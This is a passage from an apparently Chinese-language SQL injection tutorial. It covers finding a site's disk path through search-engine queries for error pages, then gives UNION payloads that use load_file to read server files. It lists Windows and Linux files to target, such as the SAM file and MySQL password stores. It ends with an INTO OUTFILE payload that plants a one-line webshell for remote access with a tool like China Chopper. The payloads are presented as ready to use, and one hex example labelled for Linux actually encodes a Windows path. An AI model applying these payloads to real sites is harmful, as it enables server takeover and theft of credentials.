進行快照抓取，包括腳本出錯頁面，因此可利用搜索引擎查找網站的出錯信息，從而獲得網站的物理路徑。可在 Google 或 百度 中搜索 “ mysql site:***.com”或“warning site:***.com,error site:***.com.cn”等。這里使用“error site:***.com”關鍵字進行查詢，從搜索結果中得到了網站的物理路徑為“E:\pujing2015”。 (4) 漏洞暴路徑，例如通過網站后臺查看網站 Web 路徑（需要root賬號密碼）、CC 攻擊暴路徑等. ### 通過load_file函數讀取文件內容 ```sql # linux，最好轉為16進制 ' union select 1,load_file(0x433A5C5C57494E444F57535C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C) -- # windows，寫雙斜線，因為可能會轉義 ' union select 1,load_file('c:\\boot.ini') -- ``` 常見WINDOWS下配置文件: ```cmd c:/windows/php.ini ●php配置信息 c:/windows/my.ini ●MYSQL配置文件，記錄管理員登陸過的MYSQL用戶名和密碼 c:\mysql\data\mysql\user.MYD ●存儲了mysql.user表中的數據庫連接密碼 c:\windows\system32\inetsrv\MetaBase.xml ●查看IIS的虛擬主機配置 d:\APACHE\Apache2\conf\httpd.conf c:\windows\repair\sam ●存儲了WINDOWS系統初次安裝的密碼 ``` 常見LUNIX/UNIX下配置文件: ```cmd /usr/local/app/apache2/conf/httpd.conf ●apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf ●虛擬網站設置 /usr/local/app/php5/lib/php.ini ●PHP相關設置 /etc/sysconfig/iptables ●從中得到防火墻規則策略 /etc/httpd/conf/httpd.conf ●apache配置文件 /etc/rsyncd.conf ●同步程序配置文件 /etc/my.cnf ●mysql的配置文件 /etc/redhat-release ●系統版本 /usr/local/resin-3.0.22/conf/resin.conf ● 針對3.0.22的RESIN配置文件查看 ``` ### 寫webshell ```sql ' union select "",2 into outfile "C:\\phpStudy\\WWW\\123.php" -- # 把一句話木馬123，輸出到C盤 \\phpStudy\\WWW\\下 ``` 然后通過菜刀等工具連接即可進入對方服務器